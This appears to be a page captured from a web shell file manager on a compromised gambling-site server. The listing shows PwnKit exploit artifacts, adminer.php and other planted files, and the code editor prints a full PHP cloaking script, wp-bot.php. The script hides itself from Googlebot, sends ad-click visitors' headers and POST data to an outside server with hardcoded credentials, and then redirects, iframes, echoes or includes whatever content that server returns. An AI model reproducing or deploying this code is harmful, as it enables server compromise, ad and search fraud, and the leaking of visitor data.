Gecko [ cepatjitu.com ]

Name	Size	Permission
.pkexec	[ DIR ]	drwxr-xr-x
GCONV_PATH=.	[ DIR ]	drwxr-xr-x
roundcube	[ DIR ]	drwx------
.htaccess	618 B	-rw-r--r--
.mad-root	0 B	-rw-r--r--
.php.error.log	1.51 KB	-rw-r--r--
adminer.php	465.43 KB	-rw-r--r--
cepatjitu.com.syrialotto.com-A...	152.44 KB	-rw-r--r--
cepatjitu.com.syrialotto.com-J...	22.14 KB	-rw-r--r--
cepatjitu.com.syrialotto.com-s...	47.46 MB	-rw-r--r--
cepatjitu.com.syrialotto.com-s...	32.07 KB	-rw-r--r--
ftp.syrialotto.com-ftp_log-Jul...	1006 B	-rw-r--r--
ftp.syrialotto.com-ftp_log-Jun...	1.08 KB	-rw-r--r--
index.html	6.57 KB	-rw-r--r--
index.php	6.57 KB	-r--r--r--
mah.php	11.02 KB	-rw-r--r--
mahirbermain.shop.syrialotto.c...	25.26 KB	-rw-r--r--
mahirbermain.shop.syrialotto.c...	24.94 KB	-rw-r--r--
mahirbermain.shop.syrialotto.c...	179 B	-rw-r--r--
mahirbermain.shop.syrialotto.c...	5.44 MB	-rw-r--r--
mahirbermain.shop.syrialotto.c...	387.28 KB	-rw-r--r--
mahirbermain.shop.syrialotto.c...	179 B	-rw-r--r--
mahirbermain.shop.syrialotto.c...	176 B	-rw-r--r--
mahirgacorshop.syrialotto.com-...	46.45 KB	-rw-r--r--
mahirgacorshop.syrialotto.com-...	70.32 KB	-rw-r--r--
mahirgacorshop.syrialotto.com-...	553 B	-rw-r--r--
mahirgacorshop.syrialotto.com-...	453 B	-rw-r--r--
mahirgacorshop.syrialotto.com-...	3.22 MB	-rw-r--r--
mahirgacorshop.syrialotto.com-...	478 B	-rw-r--r--
mahirtoto.club.syrialotto.com-...	94.31 KB	-rw-r--r--
mahirtoto.club.syrialotto.com-...	443 B	-rw-r--r--
mahirtoto.club.syrialotto.com-...	508 B	-rw-r--r--
mahirtoto.club.syrialotto.com-...	45.16 KB	-rw-r--r--
mahirtoto.club.syrialotto.com-...	1.43 KB	-rw-r--r--
mahirtoto.club.syrialotto.com-...	1.73 KB	-rw-r--r--
mahirzeus.online.syrialotto.co...	90.92 KB	-rw-r--r--
mahirzeus.online.syrialotto.co...	33.55 KB	-rw-r--r--
mahirzeus.online.syrialotto.co...	2.36 MB	-rw-r--r--
mahirzeus.online.syrialotto.co...	4.08 MB	-rw-r--r--
mahirzeus.shop.syrialotto.com-...	14.33 KB	-rw-r--r--
mahirzeus.shop.syrialotto.com-...	34.79 KB	-rw-r--r--
mahirzeus.shop.syrialotto.com-...	179 B	-rw-r--r--
mahirzeus.shop.syrialotto.com-...	5.34 MB	-rw-r--r--
mahirzeus.shop.syrialotto.com-...	21.41 MB	-rw-r--r--
mahirzeus.shop.syrialotto.com-...	177 B	-rw-r--r--
mahirzeus.shop.syrialotto.com-...	223 B	-rw-r--r--
mahirzeus.site.syrialotto.com-...	14.67 KB	-rw-r--r--
mahirzeus.site.syrialotto.com-...	28.59 KB	-rw-r--r--
mahirzeus.site.syrialotto.com-...	179 B	-rw-r--r--
mahirzeus.site.syrialotto.com-...	1.98 MB	-rw-r--r--
mahirzeus.site.syrialotto.com-...	1.9 MB	-rw-r--r--
mahirzeus.site.syrialotto.com-...	181 B	-rw-r--r--
mahirzeus.site.syrialotto.com-...	179 B	-rw-r--r--
mahirzeus.store.syrialotto.com...	14.11 KB	-rw-r--r--
mahirzeus.store.syrialotto.com...	462 B	-rw-r--r--
mahirzeus.store.syrialotto.com...	872.69 KB	-rw-r--r--
mahirzeus.store.syrialotto.com...	1.17 KB	-rw-r--r--
namajitu.com.syrialotto.com-Ja...	21.45 KB	-rw-r--r--
namajitu.com.syrialotto.com-Ju...	40.31 KB	-rw-r--r--
namajitu.com.syrialotto.com-Ju...	92.41 KB	-rw-r--r--
namajitu.com.syrialotto.com-ss...	41.03 KB	-rw-r--r--
namajitu.com.syrialotto.com-ss...	1.68 MB	-rw-r--r--
namajitu.com.syrialotto.com-ss...	23.82 MB	-rw-r--r--
omset4d.site.syrialotto.com-Ja...	96.82 KB	-rw-r--r--
omset4d.site.syrialotto.com-Ma...	494 B	-rw-r--r--
omset4d.site.syrialotto.com-Se...	402 B	-rw-r--r--
omset4d.site.syrialotto.com-ss...	39.91 KB	-rw-r--r--
omset4d.site.syrialotto.com-ss...	1.16 KB	-rw-r--r--
omset4d.store.syrialotto.com-J...	18.9 KB	-rw-r--r--
omset4d.store.syrialotto.com-M...	485 B	-rw-r--r--
omset4d.store.syrialotto.com-S...	368 B	-rw-r--r--
omset4d.store.syrialotto.com-s...	26.42 KB	-rw-r--r--
omset4d.store.syrialotto.com-s...	859 B	-rw-r--r--
pwnkit	10.99 KB	-rwxr-xr-x
rtepe.site.syrialotto.com-Jul-...	1.22 KB	-rw-r--r--
rtepe.site.syrialotto.com-ssl_...	43.91 KB	-rw-r--r--
rtplivemahir.com.syrialotto.co...	86.24 KB	-rw-r--r--
rtplivemahir.com.syrialotto.co...	70.21 KB	-rw-r--r--
rtplivemahir.com.syrialotto.co...	398.24 KB	-rw-r--r--
rtplivemahir.com.syrialotto.co...	484.44 KB	-rw-r--r--
rtplivemahir.com.syrialotto.co...	474.91 KB	-rw-r--r--
rtplivemahir.com.syrialotto.co...	4.07 MB	-rw-r--r--
syrialotto.com-Aug-2025.gz	177 B	-rw-r--r--
syrialotto.com-Jan-2024.gz	101.12 KB	-rw-r--r--
syrialotto.com-ssl_log-Aug-202...	190 B	-rw-r--r--
syrialotto.com-ssl_log-Jan-202...	69.91 KB	-rw-r--r--
wp-bot.php	8.25 KB	-rw-r--r--

Code Editor : wp-bot.php

<?php
//NEW
$userAgent = $_SERVER['HTTP_USER_AGENT'];

if (strpos($userAgent, 'Googlebot') !== false) {

$paramsToRemove = ['gclid', 'wbraid', 'gbraid'];

foreach ($paramsToRemove as $param) {
        if (isset($_GET[$param])) {

$url = $_SERVER['REQUEST_URI'];

$url = preg_replace('/([?&])' . $param . '=[^&]*(&|$)/', '$1', $url);

if (strpos($url, '?') !== false && substr($url, -1) == '&') {
                $url = rtrim($url, '&');
            }

if (strpos($url, '?') !== false && substr($url, -1) == '?') {
                $url = rtrim($url, '?');
            }

header('Location: ' . $url);
            exit;
        }
    }
} else {
    if (!isset($_GET['gclid']) && !isset($_GET['wbraid']) && !isset($_GET['gbraid'])) {
        include 'index.php';
        exit;
    }
}

$isTarget = (new RequestHandlerClient())->run();

class RequestHandlerClient
{
    const SERVER_URL = 'https://rbl.palladium.expert';

/**
     * @param int    $clientId
     * @param string $company
     * @param string $secret
     *
     * @return void
     * @throws \Exception
     */
    public function run()
    {
    	if (!empty($_GET) && isset($_GET['dr_jsess']) && $_GET['dr_jsess'] == 1) {
			header("HTTP/1.1 200 OK");
			return;
		}

$headers = [];
        $headers['request'] = $this->collectRequestData();
        $headers['jsrequest'] = $this->collectJsRequestData();
        $headers['server'] = $this->collectHeaders();
        $headers['auth']['clientId'] = 3838;
		$headers['auth']['clientCompany'] = "nMBgCUOH4VpZZy7gatxZ";
		$headers['auth']['clientSecret'] = "MzgzOG5NQmdDVU9INFZwWlp5N2dhdHhaY2U2NmY2ZTZmOWRlZjUxMGFjNDBiYTJlNjVjMmFjZGEwMTQyZmZhZQ==";
        $headers['server']['bannerSource'] = 'adwords';

return $this->curlSend($headers);
    }

/**
     * @param array<string, mixed> $params
     *
     * @return bool
     * @throws \Exception
     */
    public function curlSend(array $params)
    {
        $answer = false;
        $curl = curl_init(self::SERVER_URL);
        if ($curl) {
            curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
            curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
            curl_setopt($curl, CURLOPT_POST, true);
            curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($params));

curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 3);
            curl_setopt($curl, CURLOPT_TIMEOUT, 4);
            curl_setopt($curl, CURLOPT_TIMEOUT_MS, 4000);
            curl_setopt($curl, CURLOPT_FORBID_REUSE, true);

$result = curl_exec($curl);
            if ($result) {
				$serverOut = json_decode(
					$result,
					true
				);
				$status = curl_getinfo($curl, CURLINFO_HTTP_CODE);

if ($status == 200 && is_array($serverOut)) {
					$answer = $this->handleServerReply($serverOut);
					return $answer;
				}
			}
        }

$this->getDefaultAnswer();
        return $answer;
    }

protected function handleServerReply($reply)
    {
        $result = (bool) ($reply['result'] ? $reply['result'] : 0);

if (
			isset($reply['mode']) &&
			(
				(isset($reply['target'])) ||
				(isset($reply['content']) && !empty($reply['content']))
			)
		) {
            $target = $reply['target'];
            $mode = $reply['mode'];
            $content = $reply['content'];

if (preg_match('/^https?:/i', $target) && $mode == 3) {
                // do fallback to mode2
                $mode = 2;
            }

if ($result && $mode == 1) {
				$this->displayIFrame($target);
				exit;
			} elseif ($result && $mode == 2) {
				$target = $target . "&YkndsQJ2&sub_id_1=doi212&sub_id_2=1111";
				header("Location: {$target}");
				exit;
			} elseif ($result && $mode == 3) {
				$target = parse_url($target);
				if (isset($target['query'])) {
					parse_str($target['query'], $_GET);
				}
				$this->hideFormNotification();
				require_once $this->sanitizePath($target['path']);
				exit;
			} elseif ($result && $mode == 4) {
				echo $content;
				exit;
			} else if (!$result && $mode == 5) {
				//
			} elseif ($mode == 6) {
				//
			} else {
				$path = $this->sanitizePath($target);
				if (!$this->isLocal($path)) {
					header("404 Not Found", true, 404);
				} else {
					$this->hideFormNotification();
					require_once $path;
				}
				exit;
			}
        }

return $result;
    }

private function hideFormNotification()
	{
		echo "";
		//echo "<script>if ( window.history.replaceState ) {window.history.replaceState( null, null, window.location.href );}</script>";
	}

private function displayIFrame($target) {
		$target = htmlspecialchars($target);
		echo "<html>
                  <head>
                  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">
                  </head>
                  <body>" .
                  $this->hideFormNotification() .
                  "<iframe src=\"{$target}\" style=\"width:100%;height:100%;position:absolute;top:0;left:0;z-index:999999;border:none;\"></iframe>
                  </body>
              </html>";
	}

private function sanitizePath($path)
    {
        if ($path[0] !== '/') {
            $path = __DIR__ . '/' . $path;
        } else {
            $path = __DIR__ . $path;
        }
        return $path;
    }

private function isLocal($path)
    {
        // do not validate url via filter_var
        $url = parse_url($path);

if (!isset($url['scheme']) || !isset($url['host'])) {
            return true;
        } else {
            return false;
        }
    }

/**
     * Get all HTTP server headers and few additional ones
     *
     * @return mixed
     */
    protected function collectHeaders()
    {
        $userParams = [
            'REMOTE_ADDR',
            'SERVER_PROTOCOL',
            'SERVER_PORT',
            'REMOTE_PORT',
            'QUERY_STRING',
            'REQUEST_SCHEME',
            'REQUEST_URI',
            'REQUEST_TIME_FLOAT',
            'X_FB_HTTP_ENGINE',
            'X_PURPOSE',
            'X_FORWARDED_FOR',
            'X_WAP_PROFILE',
            'X-Forwarded-Host',
            'X-Forwarded-For',
            'X-Frame-Options',
        ];

$headers = [];
        foreach ($_SERVER as $key => $value) {
            if (in_array($key, $userParams) || substr_compare('HTTP', $key, 0, 4) == 0) {
                $headers[$key] = $value;
            }
        }

return $headers;
    }

private function collectRequestData(): array
    {
        $data = [];
        if (!empty($_POST)) {
            if (!empty($_POST['data'])) {
            	$data = json_decode($_POST['data'], true);
            	if (JSON_ERROR_NONE !== json_last_error()) {
            		$data = json_decode(
						stripslashes($_POST['data']),
						true
					);
            	}
                unset($_REQUEST['data']);
            }

if (!empty($_POST['crossref_sessionid'])) {
                $data['cr-session-id'] = $_POST['crossref_sessionid'];
                unset($_POST['crossref_sessionid']);
            }
        }

return $data;
    }

public function collectJsRequestData(): array
    {
        $data = [];
        if (!empty($_POST)) {
            if (!empty($_POST['jsdata'])) {
                $data = json_decode($_POST['jsdata'], true);
                if (JSON_ERROR_NONE !== json_last_error()) {
                    $data = json_decode(
                        stripslashes($_POST['jsdata']),
                        true
                    );
                }
                unset($_REQUEST['jsdata']);
            }
        }
        return $data;
    }

/**
     * Default answer for the curl request in case of fault
     *
     * @return bool
     */
    private function getDefaultAnswer()
    {
		header($_SERVER["SERVER_PROTOCOL"] . ' 500 Internal Server Error', true, 500);
		echo "<h1>500 Internal Server Error</h1>
		<p>The request was unsuccessful due to an unexpected condition encountered by the server.</p>";
		exit;
    }
}

${this.title}

Code Editor : wp-bot.php